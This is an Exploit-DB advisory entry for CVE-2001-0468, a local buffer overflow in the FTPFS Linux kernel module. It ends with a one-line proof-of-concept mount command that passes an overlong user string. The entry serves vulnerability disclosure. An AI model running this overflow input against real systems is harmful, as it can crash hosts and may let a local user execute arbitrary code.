FTPFS 0.1.1/0.2.1/0.2.2 mount Buffer Overflow Vulnerability

2001-03-13T00:00:00
ID EDB-ID:20691
Type exploitdb
Reporter Frank DENIS
Modified 2001-03-13T00:00:00

Description

FTPFS 0.1.1/0.2.1/0.2.2 mount Buffer Overflow Vulnerability. CVE-2001-0468. Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/2498/info

FTPFS is a Linux kernel module allowing users to mount remote files from any standard FTP server as a local filesystem.

A version of FTPFS is vulnerable to a buffer overflow leading to a denial of service, and potentially execution of arbitrary code. This overflow can be exploited by any local user with access to the mount command on a system with FTPFS installed.

mount -t ftpfs none /mnt -o ip=127.0.0.1,user=xxxxxxxxxxxxxxxxxxxxxxxxxxxx...